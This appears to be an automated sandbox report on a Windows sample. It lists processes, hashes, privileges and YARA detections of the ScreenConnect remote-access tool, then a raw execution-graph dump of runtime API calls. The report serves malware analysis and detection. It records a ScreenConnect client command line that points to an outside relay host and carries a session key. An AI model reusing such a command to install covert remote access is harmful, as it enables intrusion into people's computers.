                                                                                                                                                                                                                                        MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.3003585301.0000020C26DA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                        Start time:12:22:25
                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                        Start time:12:22:25
                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 6780 -ip 6780
                                                                                                                                                                                                                                        Imagebase:0xae0000
                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                        Start time:12:22:25
                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 884
                                                                                                                                                                                                                                        Imagebase:0xae0000
                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                        Start time:12:22:25
                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                        Start time:12:22:27
                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                        Start time:12:23:12
                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                                                                                        Imagebase:0xc50000
                                                                                                                                                                                                                                        File size:602'392 bytes
                                                                                                                                                                                                                                        MD5 hash:E1E1E3C901F0DEC41B87113165A30ACB
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000000.2508057514.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.2530078274.000000001B8E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.2527787169.000000000303D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                        Start time:12:23:13
                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=BgIAAACkAABSU0ExAAgAAAEAAQDVP1a20vKqeqe1KQFemomLm8erwhLpJp1KQnVFAxXxR%2fAz3hz0vYkeQulpCwRe9iWW0dRuBiCd4QvTjxbScJC8nEMvMHnm4MPjY73L4nGpV97oo264zQQyspkhXqNGR2iSOY6rpzvLKPopO9fWOecUGy8yJBQwR0HDB%2bV%2bDADDDeUKlr%2f%2bImJA6eJFZoh3jSThaEua7aIpOZ4Is8GgHX8wrKM81nNiWScf%2b7MB7KKIDRJByiihgKgCgnWSCJjLVCupmRFoab8THk%2fLIjFCP2pmaJw8v7WwUOPs029lZKG3850zwZwC0SO4vLP6yZA1QFVZK7Jr%2fnahgqnKFENgMAm3&r=&i=USTest%20191224%20140" "1"
                                                                                                                                                                                                                                        Imagebase:0x80000
                                                                                                                                                                                                                                        File size:95'512 bytes
                                                                                                                                                                                                                                        MD5 hash:0282251F1E4AF3F721D7192118A8FD2F
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                        Start time:12:23:13
                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=BgIAAACkAABSU0ExAAgAAAEAAQDVP1a20vKqeqe1KQFemomLm8erwhLpJp1KQnVFAxXxR%2fAz3hz0vYkeQulpCwRe9iWW0dRuBiCd4QvTjxbScJC8nEMvMHnm4MPjY73L4nGpV97oo264zQQyspkhXqNGR2iSOY6rpzvLKPopO9fWOecUGy8yJBQwR0HDB%2bV%2bDADDDeUKlr%2f%2bImJA6eJFZoh3jSThaEua7aIpOZ4Is8GgHX8wrKM81nNiWScf%2b7MB7KKIDRJByiihgKgCgnWSCJjLVCupmRFoab8THk%2fLIjFCP2pmaJw8v7WwUOPs029lZKG3850zwZwC0SO4vLP6yZA1QFVZK7Jr%2fnahgqnKFENgMAm3&r=&i=USTest%20191224%20140" "1"
                                                                                                                                                                                                                                        Imagebase:0x80000
                                                                                                                                                                                                                                        File size:95'512 bytes
                                                                                                                                                                                                                                        MD5 hash:0282251F1E4AF3F721D7192118A8FD2F
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                        Start time:12:23:14
                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe" "RunRole" "1cec62b5-23ad-4984-ac47-8ca096d23ddd" "User"
                                                                                                                                                                                                                                        Imagebase:0x4d0000
                                                                                                                                                                                                                                        File size:602'392 bytes
                                                                                                                                                                                                                                        MD5 hash:E1E1E3C901F0DEC41B87113165A30ACB
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:2.1%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:3.8%
                                                                                                                                                                                                                                          Total number of Nodes:1465
                                                                                                                                                                                                                                          Total number of Limit Nodes:4
373a6f 6790->6792 6791->6792 6793 374949 _free 15 API calls 6791->6793 6792->6788 6794 373a5f 6793->6794 6795 37488d _abort 21 API calls 6794->6795 6796 373a6a 6795->6796 6796->6788 6631 371ab9 6632 371af0 6631->6632 6633 371acb 6631->6633 6633->6632 6640 3721ea 6633->6640 6638 373fd9 33 API calls 6639 371b0e 6638->6639 6641 372513 43 API calls 6640->6641 6642 371afd 6641->6642 6643 3721f3 6642->6643 6644 372513 43 API calls 6643->6644 6645 371b07 6644->6645 6645->6638 6646 3730a3 6647 3730b2 6646->6647 6648 3730ce 6646->6648 6647->6648 6649 3730b8 6647->6649 6650 37537b 46 API calls 6648->6650 6651 374949 _free 15 API calls 6649->6651 6652 3730d5 GetModuleFileNameA 6650->6652 6653 3730bd 6651->6653 6654 3730f9 6652->6654 6655 37488d _abort 21 API calls 6653->6655 6669 3731c7 6654->6669 6657 3730c7 6655->6657 6659 37333c 15 API calls 6660 373123 6659->6660 6661 37312c 6660->6661 6662 373138 6660->6662 6663 374949 _free 15 API calls 6661->6663 6664 3731c7 33 API calls 6662->6664 6668 373131 6663->6668 6666 37314e 6664->6666 6665 3749b9 _free 15 API calls 6665->6657 6667 3749b9 _free 15 API calls 6666->6667 6666->6668 6667->6668 6668->6665 6671 3731ec 6669->6671 6670 375706 33 API calls 6670->6671 6671->6670 6673 37324c 6671->6673 6672 373116 6672->6659 6673->6672 6674 375706 33 API calls 6673->6674 6674->6673 6797 3769e3 GetProcessHeap 6675 3774a1 6676 3774ae 6675->6676 6677 37495c _abort 15 API calls 6676->6677 6678 3774c8 6677->6678 6679 3749b9 _free 15 API calls 6678->6679 6680 3774d4 6679->6680 6681 37495c _abort 15 API calls 6680->6681 6685 3774fa 6680->6685 6682 3774ee 6681->6682 6684 3749b9 _free 15 API calls 6682->6684 6683 375b03 6 API calls 6683->6685 6684->6685 6685->6683 6686 377506 6685->6686 5840 376120 5841 37612c ___scrt_is_nonwritable_in_current_image 5840->5841 5852 375832 EnterCriticalSection 5841->5852 5843 376133 5853 375ddb 5843->5853 5845 376142 5846 376151 5845->5846 5866 375fb4 GetStartupInfoW 5845->5866 5877 37616d 5846->5877 5850 376162 
_abort 5852->5843 5854 375de7 ___scrt_is_nonwritable_in_current_image 5853->5854 5855 375df4 5854->5855 5856 375e0b 5854->5856 5858 374949 _free 15 API calls 5855->5858 5880 375832 EnterCriticalSection 5856->5880 5859 375df9 5858->5859 5860 37488d _abort 21 API calls 5859->5860 5861 375e03 _abort 5860->5861 5861->5845 5862 375e43 5888 375e6a 5862->5888 5865 375e17 5865->5862 5881 375d2c 5865->5881 5867 375fd1 5866->5867 5869 376063 5866->5869 5868 375ddb 22 API calls 5867->5868 5867->5869 5870 375ffa 5868->5870 5872 37606a 5869->5872 5870->5869 5871 376028 GetFileType 5870->5871 5871->5870 5873 376071 5872->5873 5874 3760b4 GetStdHandle 5873->5874 5875 37611c 5873->5875 5876 3760c7 GetFileType 5873->5876 5874->5873 5875->5846 5876->5873 5897 37587a LeaveCriticalSection 5877->5897 5879 376174 5879->5850 5880->5865 5882 37495c _abort 15 API calls 5881->5882 5887 375d3e 5882->5887 5883 375d4b 5884 3749b9 _free 15 API calls 5883->5884 5886 375d9d 5884->5886 5886->5865 5887->5883 5891 375b03 5887->5891 5896 37587a LeaveCriticalSection 5888->5896 5890 375e71 5890->5861 5892 375891 _abort 5 API calls 5891->5892 5893 375b2a 5892->5893 5894 375b48 InitializeCriticalSectionAndSpinCount 5893->5894 5895 375b33 _ValidateLocalCookies 5893->5895 5894->5895 5895->5887 5896->5890 5897->5879 6009 377b60 6012 377b77 6009->6012 6013 377b85 6012->6013 6014 377b99 6012->6014 6015 374949 _free 15 API calls 6013->6015 6016 377bb3 6014->6016 6017 377ba1 6014->6017 6018 377b8a 6015->6018 6022 3740c2 __fassign 33 API calls 6016->6022 6023 377b72 6016->6023 6019 374949 _free 15 API calls 6017->6019 6020 37488d _abort 21 API calls 6018->6020 6021 377ba6 6019->6021 6020->6023 6024 37488d _abort 21 API calls 6021->6024 6022->6023 6024->6023 5898 37142e 5901 372e40 5898->5901 5900 37143f 5902 3745f8 _free 15 API calls 5901->5902 5903 372e57 _ValidateLocalCookies 5902->5903 5903->5900 6687 3737ad 6688 373fd9 33 API calls 6687->6688 6689 3737b5 6688->6689 6025 377e6c 6026 37537b 46 API calls 
6025->6026 6027 377e71 6026->6027 6028 377569 6038 378102 6028->6038 6032 377576 6051 3783de 6032->6051 6035 3775a0 6036 3749b9 _free 15 API calls 6035->6036 6037 3775ab 6036->6037 6055 37810b 6038->6055 6040 377571 6041 37833e 6040->6041 6042 37834a ___scrt_is_nonwritable_in_current_image 6041->6042 6075 375832 EnterCriticalSection 6042->6075 6044 3783c0 6089 3783d5 6044->6089 6046 378394 DeleteCriticalSection 6049 3749b9 _free 15 API calls 6046->6049 6047 3783cc _abort 6047->6032 6050 378355 6049->6050 6050->6044 6050->6046 6076 37916c 6050->6076 6052 3783f4 6051->6052 6053 377585 DeleteCriticalSection 6051->6053 6052->6053 6054 3749b9 _free 15 API calls 6052->6054 6053->6032 6053->6035 6054->6053 6056 378117 ___scrt_is_nonwritable_in_current_image 6055->6056 6065 375832 EnterCriticalSection 6056->6065 6058 3781ba 6070 3781da 6058->6070 6061 3781c6 _abort 6061->6040 6063 378126 6063->6058 6064 3780bb 61 API calls 6063->6064 6066 3775b5 EnterCriticalSection 6063->6066 6067 3781b0 6063->6067 6064->6063 6065->6063 6066->6063 6073 3775c9 LeaveCriticalSection 6067->6073 6069 3781b8 6069->6063 6074 37587a LeaveCriticalSection 6070->6074 6072 3781e1 6072->6061 6073->6069 6074->6072 6075->6050 6077 379178 ___scrt_is_nonwritable_in_current_image 6076->6077 6078 37919e 6077->6078 6079 379189 6077->6079 6088 379199 _abort 6078->6088 6092 3775b5 EnterCriticalSection 6078->6092 6080 374949 _free 15 API calls 6079->6080 6081 37918e 6080->6081 6083 37488d _abort 21 API calls 6081->6083 6083->6088 6084 3791ba 6093 3790f6 6084->6093 6086 3791c5 6109 3791e2 6086->6109 6088->6050 6347 37587a LeaveCriticalSection 6089->6347 6091 3783dc 6091->6047 6092->6084 6094 379103 6093->6094 6095 379118 6093->6095 6096 374949 _free 15 API calls 6094->6096 6101 379113 6095->6101 6112 378055 6095->6112 6097 379108 6096->6097 6099 37488d _abort 21 API calls 6097->6099 6099->6101 6101->6086 6102 3783de 15 API calls 6103 379134 6102->6103 6118 37747b 6103->6118 6105 37913a 6125 379e9e 6105->6125 
6108 3749b9 _free 15 API calls 6108->6101 6346 3775c9 LeaveCriticalSection 6109->6346 6111 3791ea 6111->6088 6113 37806d 6112->6113 6115 378069 6112->6115 6114 37747b 21 API calls 6113->6114 6113->6115 6116 37808d 6114->6116 6115->6102 6140 378af7 6116->6140 6119 377487 6118->6119 6120 37749c 6118->6120 6121 374949 _free 15 API calls 6119->6121 6120->6105 6122 37748c 6121->6122 6123 37488d _abort 21 API calls 6122->6123 6124 377497 6123->6124 6124->6105 6126 379ec2 6125->6126 6127 379ead 6125->6127 6129 379efd 6126->6129 6134 379ee9 6126->6134 6128 374936 __dosmaperr 15 API calls 6127->6128 6131 379eb2 6128->6131 6130 374936 __dosmaperr 15 API calls 6129->6130 6132 379f02 6130->6132 6133 374949 _free 15 API calls 6131->6133 6135 374949 _free 15 API calls 6132->6135 6138 379140 6133->6138 6303 379e76 6134->6303 6137 379f0a 6135->6137 6139 37488d _abort 21 API calls 6137->6139 6138->6101 6138->6108 6139->6138 6141 378b03 ___scrt_is_nonwritable_in_current_image 6140->6141 6142 378b0b 6141->6142 6145 378b23 6141->6145 6165 374936 6142->6165 6144 378bc1 6147 374936 __dosmaperr 15 API calls 6144->6147 6145->6144 6150 378b58 6145->6150 6149 378bc6 6147->6149 6148 374949 _free 15 API calls 6158 378b18 _abort 6148->6158 6151 374949 _free 15 API calls 6149->6151 6168 375e73 EnterCriticalSection 6150->6168 6153 378bce 6151->6153 6155 37488d _abort 21 API calls 6153->6155 6154 378b5e 6156 378b8f 6154->6156 6157 378b7a 6154->6157 6155->6158 6169 378be2 6156->6169 6160 374949 _free 15 API calls 6157->6160 6158->6115 6161 378b7f 6160->6161 6163 374936 __dosmaperr 15 API calls 6161->6163 6162 378b8a 6218 378bb9 6162->6218 6163->6162 6166 3745f8 _free 15 API calls 6165->6166 6167 37493b 6166->6167 6167->6148 6168->6154 6170 378c10 6169->6170 6176 378c09 _ValidateLocalCookies 6169->6176 6171 378c14 6170->6171 6172 378c33 6170->6172 6173 374936 __dosmaperr 15 API calls 6171->6173 6174 378c67 6172->6174 6175 378c84 6172->6175 6177 378c19 6173->6177 6178 374936 __dosmaperr 15 API calls 
6174->6178 6180 378c9a 6175->6180 6221 3790db 6175->6221 6176->6162 6179 374949 _free 15 API calls 6177->6179 6181 378c6c 6178->6181 6182 378c20 6179->6182 6224 378787 6180->6224 6185 374949 _free 15 API calls 6181->6185 6186 37488d _abort 21 API calls 6182->6186 6188 378c74 6185->6188 6186->6176 6193 37488d _abort 21 API calls 6188->6193 6189 378ce1 6194 378cf5 6189->6194 6195 378d3b WriteFile 6189->6195 6190 378ca8 6191 378cce 6190->6191 6192 378cac 6190->6192 6236 378567 GetConsoleCP 6191->6236 6196 378da2 6192->6196 6231 37871a 6192->6231 6193->6176 6199 378cfd 6194->6199 6200 378d2b 6194->6200 6198 378d5e GetLastError 6195->6198 6206 378cc4 6195->6206 6196->6176 6207 374949 _free 15 API calls 6196->6207 6198->6206 6203 378d02 6199->6203 6204 378d1b 6199->6204 6256 3787fd 6200->6256 6203->6196 6245 3788dc 6203->6245 6250 3789ca 6204->6250 6206->6176 6206->6196 6209 378d7e 6206->6209 6208 378dc7 6207->6208 6211 374936 __dosmaperr 15 API calls 6208->6211 6212 378d85 6209->6212 6213 378d99 6209->6213 6211->6176 6215 374949 _free 15 API calls 6212->6215 6261 374913 6213->6261 6216 378d8a 6215->6216 6217 374936 __dosmaperr 15 API calls 6216->6217 6217->6176 6302 375e96 LeaveCriticalSection 6218->6302 6220 378bbf 6220->6158 6266 37905d 6221->6266 6288 377fff 6224->6288 6226 378797 6227 37879c 6226->6227 6228 374574 _abort 33 API calls 6226->6228 6227->6189 6227->6190 6230 3787bf 6228->6230 6229 3787dd GetConsoleMode 6229->6227 6230->6227 6230->6229 6234 378774 6231->6234 6235 37873f 6231->6235 6232 378776 GetLastError 6232->6234 6233 379251 WriteConsoleW CreateFileW 6233->6235 6234->6206 6235->6232 6235->6233 6235->6234 6237 3786dc _ValidateLocalCookies 6236->6237 6238 3785ca 6236->6238 6237->6206 6238->6237 6240 378650 WideCharToMultiByte 6238->6240 6241 377407 35 API calls __fassign 6238->6241 6244 3786a7 WriteFile 6238->6244 6297 3761a2 6238->6297 6240->6237 6242 378676 WriteFile 6240->6242 6241->6238 6242->6238 6243 3786ff GetLastError 6242->6243 6243->6237 
6244->6238 6244->6243 6246 3788eb 6245->6246 6247 3789ad _ValidateLocalCookies 6246->6247 6248 378969 WriteFile 6246->6248 6247->6206 6248->6246 6249 3789af GetLastError 6248->6249 6249->6247 6255 3789d9 6250->6255 6251 378ae4 _ValidateLocalCookies 6251->6206 6252 378a5b WideCharToMultiByte 6253 378a90 WriteFile 6252->6253 6254 378adc GetLastError 6252->6254 6253->6254 6253->6255 6254->6251 6255->6251 6255->6252 6255->6253 6258 37880c 6256->6258 6257 3788bf _ValidateLocalCookies 6257->6206 6258->6257 6259 37887e WriteFile 6258->6259 6259->6258 6260 3788c1 GetLastError 6259->6260 6260->6257 6262 374936 __dosmaperr 15 API calls 6261->6262 6263 37491e _free 6262->6263 6264 374949 _free 15 API calls 6263->6264 6265 374931 6264->6265 6265->6176 6275 375f4a 6266->6275 6268 37906f 6269 379077 6268->6269 6270 379088 SetFilePointerEx 6268->6270 6271 374949 _free 15 API calls 6269->6271 6272 3790a0 GetLastError 6270->6272 6273 37907c 6270->6273 6271->6273 6274 374913 __dosmaperr 15 API calls 6272->6274 6273->6180 6274->6273 6276 375f57 6275->6276 6277 375f6c 6275->6277 6278 374936 __dosmaperr 15 API calls 6276->6278 6279 374936 __dosmaperr 15 API calls 6277->6279 6281 375f91 6277->6281 6280 375f5c 6278->6280 6282 375f9c 6279->6282 6283 374949 _free 15 API calls 6280->6283 6281->6268 6284 374949 _free 15 API calls 6282->6284 6285 375f64 6283->6285 6286 375fa4 6284->6286 6285->6268 6287 37488d _abort 21 API calls 6286->6287 6287->6285 6289 37800c 6288->6289 6290 378019 6288->6290 6291 374949 _free 15 API calls 6289->6291 6292 378025 6290->6292 6293 374949 _free 15 API calls 6290->6293 6294 378011 6291->6294 6292->6226 6295 378046 6293->6295 6294->6226 6296 37488d _abort 21 API calls 6295->6296 6296->6294 6298 374574 _abort 33 API calls 6297->6298 6299 3761ad 6298->6299 6300 377421 __fassign 33 API calls 6299->6300 6301 3761bd 6300->6301 6301->6238 6302->6220 6306 379df4 6303->6306 6305 379e9a 6305->6138 6307 379e00 ___scrt_is_nonwritable_in_current_image 6306->6307 6317 375e73 
EnterCriticalSection 6307->6317 6309 379e0e 6310 379e35 6309->6310 6311 379e40 6309->6311 6318 379f1d 6310->6318 6313 374949 _free 15 API calls 6311->6313 6314 379e3b 6313->6314 6333 379e6a 6314->6333 6316 379e5d _abort 6316->6305 6317->6309 6319 375f4a 21 API calls 6318->6319 6322 379f2d 6319->6322 6320 379f33 6336 375eb9 6320->6336 6322->6320 6325 375f4a 21 API calls 6322->6325 6332 379f65 6322->6332 6323 375f4a 21 API calls 6327 379f71 CloseHandle 6323->6327 6326 379f5c 6325->6326 6329 375f4a 21 API calls 6326->6329 6327->6320 6330 379f7d GetLastError 6327->6330 6328 379fad 6328->6314 6329->6332 6330->6320 6331 374913 __dosmaperr 15 API calls 6331->6328 6332->6320 6332->6323 6345 375e96 LeaveCriticalSection 6333->6345 6335 379e74 6335->6316 6337 375f2f 6336->6337 6338 375ec8 6336->6338 6339 374949 _free 15 API calls 6337->6339 6338->6337 6344 375ef2 6338->6344 6340 375f34 6339->6340 6341 374936 __dosmaperr 15 API calls 6340->6341 6342 375f1f 6341->6342 6342->6328 6342->6331 6343 375f19 SetStdHandle 6343->6342 6344->6342 6344->6343 6345->6335 6346->6111 6347->6091 6690 379296 IsProcessorFeaturePresent 6798 373ed6 6799 3720cd ___scrt_uninitialize_crt 7 API calls 6798->6799 6800 373edd 6799->6800 5904 379a15 5905 379a3d 5904->5905 5906 379a75 5905->5906 5907 379a67 5905->5907 5908 379a6e 5905->5908 5909 379ae7 16 API calls 5907->5909 5913 379ad0 5908->5913 5911 379a6c 5909->5911 5914 379af0 5913->5914 5915 37a1bf __startOneArgErrorHandling 16 API calls 5914->5915 5916 379a73 5915->5916 5917 37a013 5918 37a01d 5917->5918 5919 37a029 5917->5919 5918->5919 5920 37a022 CloseHandle 5918->5920 5920->5919 6691 373e91 6694 37356b 6691->6694 6695 37357a 6694->6695 6696 3734c6 15 API calls 6695->6696 6697 373594 6696->6697 6698 3734c6 15 API calls 6697->6698 6699 37359f 6698->6699 6348 373550 6349 373562 6348->6349 6350 373568 6348->6350 6351 3734c6 15 API calls 6349->6351 6351->6350 6352 371f50 6354 371f6e ___except_validate_context_record _ValidateLocalCookies 
__IsNonwritableInCurrentImage 6352->6354 6353 371fee _ValidateLocalCookies 6354->6353 6357 372490 RtlUnwind 6354->6357 6356 372077 _ValidateLocalCookies 6357->6356 6358 37445f 6359 37447a 6358->6359 6360 37446a 6358->6360 6364 374480 6360->6364 6363 3749b9 _free 15 API calls 6363->6359 6365 374493 6364->6365 6366 374499 6364->6366 6367 3749b9 _free 15 API calls 6365->6367 6368 3749b9 _free 15 API calls 6366->6368 6367->6366 6369 3744a5 6368->6369 6370 3749b9 _free 15 API calls 6369->6370 6371 3744b0 6370->6371 6372 3749b9 _free 15 API calls 6371->6372 6373 3744bb 6372->6373 6374 3749b9 _free 15 API calls 6373->6374 6375 3744c6 6374->6375 6376 3749b9 _free 15 API calls 6375->6376 6377 3744d1 6376->6377 6378 3749b9 _free 15 API calls 6377->6378 6379 3744dc 6378->6379 6380 3749b9 _free 15 API calls 6379->6380 6381 3744e7 6380->6381 6382 3749b9 _free 15 API calls 6381->6382 6383 3744f2 6382->6383 6384 3749b9 _free 15 API calls 6383->6384 6385 374500 6384->6385 6390 374346 6385->6390 6396 374252 6390->6396 6392 37436a 6393 374396 6392->6393 6409 3742b3 6393->6409 6395 3743ba 6395->6363 6397 37425e ___scrt_is_nonwritable_in_current_image 6396->6397 6404 375832 EnterCriticalSection 6397->6404 6400 374268 6401 3749b9 _free 15 API calls 6400->6401 6403 374292 6400->6403 6401->6403 6402 37429f _abort 6402->6392 6405 3742a7 6403->6405 6404->6400 6408 37587a LeaveCriticalSection 6405->6408 6407 3742b1 6407->6402 6408->6407 6410 3742bf ___scrt_is_nonwritable_in_current_image 6409->6410 6417 375832 EnterCriticalSection 6410->6417 6412 3742c9 6413 374529 _abort 15 API calls 6412->6413 6414 3742dc 6413->6414 6418 3742f2 6414->6418 6416 3742ea _abort 6416->6395 6417->6412 6421 37587a LeaveCriticalSection 6418->6421 6420 3742fc 6420->6416 6421->6420 6801 373edf 6802 373eee 6801->6802 6806 373f02 6801->6806 6804 3749b9 _free 15 API calls 6802->6804 6802->6806 